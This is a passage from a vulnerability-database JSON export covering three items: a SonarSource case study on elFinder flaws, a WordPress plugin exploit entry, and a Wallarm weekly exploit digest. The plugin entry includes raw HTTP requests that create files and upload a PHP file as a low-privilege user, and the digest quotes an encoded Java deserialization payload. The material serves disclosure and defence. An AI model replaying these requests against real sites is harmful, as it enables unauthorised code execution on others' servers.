ATTRIB win.php\n [...]\n ./efbf975ccbac8727f434574610a0f1b6/ DELETE win.php\n [...]\n ./efbf975ccbac8727f434574610a0f1b6/ DELETE_SELF\n\nThis trace can be understood as:\n\n * A folder named efbf975ccbac8727f434574610a0f1b6 is created,\n * A file named win.php is created within efbf975ccbac8727f434574610a0f1b6,\n * Data is written into win.php,\n * win.php is deleted,\n * efbf975ccbac8727f434574610a0f1b6 is deleted.\n\nIf the server is configured to list directories, this behavior can easily be exploited, since dangerous files (e.g. .php) can be accessed right before the MIME validation step and their removal. The race condition window is however too small to think of an attack involving brute force if the random directory name can\u2019t be found that way. \n\nAn attacker could discover that the duplicate action can be used on the internal folders, like .quarantine, and copy any file regardless of its contents. While being a harmless functional bug on its own, it can be chained with the quarantine feature to duplicate the folder containing our extracted archive just before its deletion. The duplicated folder is then visible in the interface, and allows an attacker to get around the random name to access the malicious script, ultimately granting arbitrary code execution.\n\nAs a [fix](<https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17#diff-6fe96d285bdbb6d8cf10335a4684ceb4f8badaa6bb7190a4f6b0d960d1af8904L78-R232\\)>), the maintainers decided to move the .quarantine folder outside of files/. The elFinderVolumeLocalFileSystem abstraction layer is not aware of anything outside of this folder, preventing any unintended action on .quarantine.\n\n## Timeline\n\n<table class="table table-striped"><thead><tr><th>Date</th><th>Action</th></tr></thead><tbody><tr><td>2021-03-22</td><td>These 5 issues are reported to maintainers</td></tr><tr><td>2021-06-10</td><td>The maintainers acknowledge all our findings</td></tr><tr><td>2021-06-13</td><td>elFinder 2.1.59 is released, fixing the bugs we reported</td></tr><tr><td>2021-06-13</td><td>CVE-2021-32682 and CVE-2021-23394 are assigned</td></tr></tbody></table>\n\n## Summary\n\nIn this case study we looked at critical code vulnerabilities that are commonly found in web file managers. We presented several of our real-world findings in the latest version of elFinder available at the time, including their potential impact and how they were fixed by the vendor. It allowed us to demonstrate that innocuous bugs can often be combined to gain arbitrary code execution. We believe it is important to document and report these vulnerabilities to break future bug chains and reduce the risk of similar issues.\n\nWe also learned that working with paths is not easy and that extra measures should be taken: performing additional checks in the \u201clow-level\u201d functions, using basename() and dirname() with confidence (and knowing their limits!) and always validating user-controlled data. Such bugs are very common in web file managers, and you should always have such bugs in mind when working with them.\n\nWhile we don\u2019t plan to release any exploits for these bugs, we would still like to bring your attention to the fact that arbitrary code execution was easily demonstrated and attackers won\u2019t have much trouble replicating it. We urge you to immediately upgrade to elFinder 2.1.59. We also advise enforcing strong access control on the connector (e.g. basic access authentication). \n\nFinally, we would like to thank the maintainers of elFinder for acknowledging our advisory and fixing these vulnerabilities in a timely and professional manner.\n\n## Related Blog Posts\n\n * <https://blog.sonarsource.com/php-supply-chain-attack-on-composer>\n * <https://blog.sonarsource.com/bitbucket-path-traversal-to-rce>\n * <https://blog.sonarsource.com/wordpress-file-delete-to-code-execution>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-17T00:00:00", "type": "sonarsource", "title": "elFinder - A Case Study of Web File Manager Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23394", "CVE-2021-32682"], "modified": "2021-08-17T00:00:00", "id": "SONARSOURCE:82C920BF6FA095A2CE2867D1EBDCCC6E", "href": "https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2022-04-15T14:18:16", "description": "The plugin is using an outdated version of the elFinder library, which is know to be affected by security issues (CVE-2021-32682), and does not have any authorisation as well as CSRF checks in its connector AJAX action, allowing any authenticated users, such as subscriber to call it. Furthermore, as the options passed to the elFinder library does not restrict any file type, users with a role as low as subscriber can Create/Upload/Delete Arbitrary files and folders.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "wpexploit", "title": " Library File Manager < 5.2.3 - Subscriber+ Arbitrary File Creation/Upload/Deletion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682", "CVE-2022-0403"], "modified": "2022-04-11T07:40:39", "id": "WPEX-ID:997A7FBF-98C6-453E-AD84-75C1E91D5A1E", "href": "", "sourceData": "Create an empty file to /aa.txt:\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 53\r\nConnection: close\r\nCookie: [any authenticated user]\r\n\r\naction=connector&cmd=mkfile&name=aa.txt&target=l1_Lw\r\n\r\nUpload a PHP file to /hello.php:\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: multipart/form-data; boundary=---------------------------14077557643203747161684872583\r\nContent-Length: 597\r\nConnection: close\r\nCookie: [any authenticated user]\r\n\r\n-----------------------------14077557643203747161684872583\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------14077557643203747161684872583\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------14077557643203747161684872583\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nconnector\r\n-----------------------------14077557643203747161684872583\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"hello.php\"\r\nContent-Type: text/plain\r\n\r\n<?php echo 'failed'; ?>\r\n\r\n-----------------------------14077557643203747161684872583--\r\n\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wallarmlab": [{"lastseen": "2021-08-19T16:35:42", "description": "Welcome to the Wallarm weekly web exploits digest! Since this week, we will publish our weekly digests consists of web exploits with CVSS scores higher than 5. It will be followed by explanations, risks analysis, related stories and news. So, here we go! \n\n**The most sophisticated and interesting exploit** was out of this score for some reason, but who we are to argue with CVSS score ![\ud83d\ude09](https://s.w.org/images/core/emoji/13.1.0/72x72/1f609.png) This is the Apache OFBiz XML-RPC Java Serialization Remote Code Execution issues <https://vulners.com/packetstorm/PACKETSTORM:161769> where you can find a XML-packed and Base64 encoded Java deserialization payload:\n \n \n <name>#{rand_text_alphanumeric(8..42)}</name> \n <value> \n <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">#{Rex::Text.encode_base64(data)}</serializable> \n </value> \n\nThis nutshell bypass WAFs, IPS/IDS, and NGFW systems by default since the malicious payload can be actually encoded there twice - by the Base64 first and then by XML encodings like built-in or defined entities. \n\n**The most dangerous exploit released last week **was definitely a VMware vCenter RCE. \n\nIn general, last week our harvest of exploits to CVSS 5+ scored vulnerabilities looks in the following way concerning their types:\n\nType| # \n---|--- \nFile upload| 2 \nPHP Object Injection| 2 \nSQL Injection| 2 \nBuffer overflow| 1 \nXSS| 1 \nSSFR| 1 \nDeserialization| 1 \nEnumeration| 1 \nThe week of March 8th - 15th web exploits stats, CVSS >5\n\nSo, the hackers' arsenal has been reinforced between dates of 2021-03-08 and 2021-03-15 with exploitation tools for the next software:\n\n * **VMware vCenter Server** - This one is the winner of the week having 10 points severity score\n * **QCubed 3.1.1** - Three high-severity exploits arrived for this product\n * **Golden FTP Server 4.70**\n * **HPE Systems Insight Manager**\n * **Joomla JCK Editor**\n * **SonLogger 4.2.3.3**\n * **Microsoft Exchange 2019**\n * **ForkCMS**\n * **Atlassian JIRA**\n\nHere is the list of the hi-scored reinforcements and a short brief for the headliners\u2019 mechanics:\n\n* * *\n\n2021-03-08 \n**[VMware vCenter Server File Upload / Remote Code Execution](<https://vulners.com/packetstorm/PACKETSTORM:161695>) \nScore: CVSS 10 \nType: File upload \nMetasploit + \n[CVE-2021-21972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972>)**\n\nThis new high-scored RCE metasploit module exploits an unauthenticated OVA file upload and a path traversal vulnerability in VMware vCenter Server. It writes a JSP payload to a web-accessible directory, and vulnerable Linux versions aren\u2019t exploitable via a web shell. Writing an SSH public key to authorized_keys works okay, but due to the user\u2019s non-existent password expiration in 90 days after install, this technique quite useless when applied in a production environment. Nevertheless, it works well with Windows appliances and older Linux versions. \n**Extra: \n[Why WAFs can\u2019t catch VMware CVE-2021-21972](<https://vulners.com/wallarmlab/WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0>)**\n\n* * *\n\n2021-03-09 \n**[Golden FTP Server 4.70 Buffer Overflow](<https://vulners.com/packetstorm/PACKETSTORM:161711>) \n[CVE-2006-6576](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6576>) \nScore: CVSS 7.5 \nType: Buffer overflow**\n\nA buffer overflow exists in GoldenFTP authentication procedure. Note that the source IP address of the user performing the authentication forms part of the buffer and, as such, must be accounted for when calculating the appropriate offset. It should also be noted that the exploit is somewhat unstable, and if exploitation fails, GoldenFTP will be left in a state where it will still accept connections, but it will be unable to handle or process them in any way, so be careful.\n\n* * *\n\n2021-03-09 \n**[HPE Systems Insight Manager AMF Deserialization Remote Code Execution](<https://vulners.com/packetstorm/PACKETSTORM:161721>) \nCVSS 7.5 \n[CVE-2020-7200](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-7200>) \nType: Deserialization**\n\nA remotely exploitable vulnerability exists within HPE System Insight Manager (SIM) version 7.6.x that can be leveraged remotely by an unauthenticated attacker to execute code within the context of HPE System Insight Manager\u2019s hpsimsvc.exe process, which runs with administrative privileges. The vulnerability occurs due to a failure to validate data during the deserialization process when a user submits a POST request to the /simsearch/messagebroker/amfsecure page. The module exploits this vulnerability by leveraging an outdated copy of Commons Collection, namely 3.2.2, that ships with HPE SIM to gain RCE as the administrative user running HPE SIM.\n\n* * *\n\n2021-03-12 \n**[QCubed 3.1.1 PHP Object Injection](<https://vulners.com/packetstorm/PACKETSTORM:161758>) \nScore: CVSS 7.5 \nType: PHP Object Injection \n[CVE-2020-24914](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-24914>)**\n\nA PHP object injection bug in profile.php in qcubed (all versions including 3.1.1) unserializes the untrusted data of the POST-variable \u201cstrProfileData\u201d and allows an unauthenticated attacker to execute code remotely via a crafted POST request.\n\n* * *\n\n2021-03-12 \n**[QCubed 3.1.1 SQL Injection](<https://vulners.com/packetstorm/PACKETSTORM:161759>) \nScore: CVSS 7.5 \nType: SQL Injection \n[CVE-2020-24913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-24913>)**\n\nAn SQL injection vulnerability in qcubed (all versions including 3.1.1) in profile.php via the strQuery parameter allows an unauthenticated attacker to access the database by injecting SQL code via a crafted POST request. As a result, an unauthenticated attacker can get access the database remotely. In worst-case scenarios, an attacker might be able to execute code on the remote machine.\n\n* * *\n\n2021-03-08 \n**[Joomla JCK Editor 6.4.4 SQL Injection](<https://vulners.com/packetstorm/PACKETSTORM:161683>) \nScore: CVSS 7.5 \nType: SQL Injection \n[CVE-2018-17254](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-17254>)**\n\n* * *\n\n2021-03-15 \n**[SonLogger 4.2.3.3 Shell Upload (Unauthenticated Arbitrary File Upload)](<https://vulners.com/packetstorm/PACKETSTORM:161793>) \nScore: CVSS 7.5 \nType: File upload \n[CVE-2021-27964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27964>) \nMetasploit +**\n\n* * *\n\n**[Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)](<https://vulners.com/exploitdb/EDB-ID:49637>) \nScore: CVSS 7.5 \nType: SSRF \n[CVE-2021-27065](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27065>) \n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>)**\n\n* * *\n\n2021-03-12 \n**[QCubed 3.1.1 Cross Site Scripting](<https://vulners.com/packetstorm/PACKETSTORM:161763>) \nScore: CVSS 7.5 \nType: XSS \n[CVE-2020-24912](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24912>)**\n\n* * *\n\n2021-03-12 \n**[ForkCMS PHP Object Injection](<https://vulners.com/packetstorm/PACKETSTORM:161764>) \nScore: CVSS 6.5 \nType: PHP Object Injection \n[CVE-2020-24036](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-24036>)**\n\n* * *\n\n2021-03-10 \n**[Atlassian JIRA 8.11.1 User Enumeration](<https://vulners.com/packetstorm/PACKETSTORM:161730>) \nScore: CVSS 6.1 \nType: Enumeraion \n[CVE-2020-14181](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14181>)**\n\nThe post [Web vulnerabilities exploit weekly digest #1. March 8-15th 2021. VMware vCenter and Apache OFBiz RCE.](<https://lab.wallarm.com/web-vulnerabilities-exploits-weekly-digest-1-march-8-15th-2021-vmware-vcenter-and-apache-ofbiz-rce/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T18:22:00", "type": "wallarmlab", "title": "Web vulnerabilities exploit weekly digest #1. March 8-15th 2021. VMware vCenter and Apache OFBiz RCE.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-6576", "CVE-2018-17254", "CVE-2020-14181", "CVE-2020-24036", "CVE-2020-24912", "CVE-2020-24913", "CVE-2020-24914", "CVE-2020-7200", "CVE-2021-21972", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-27964"], "modified": "2021-03-16T18:22:00", "id": "WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "href": "https://lab.wallarm.com/web-vulnerabilities-exploits-weekly-digest-1-march-8-15th-2021-vmware-vcenter-and-apache-ofbiz-rce/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}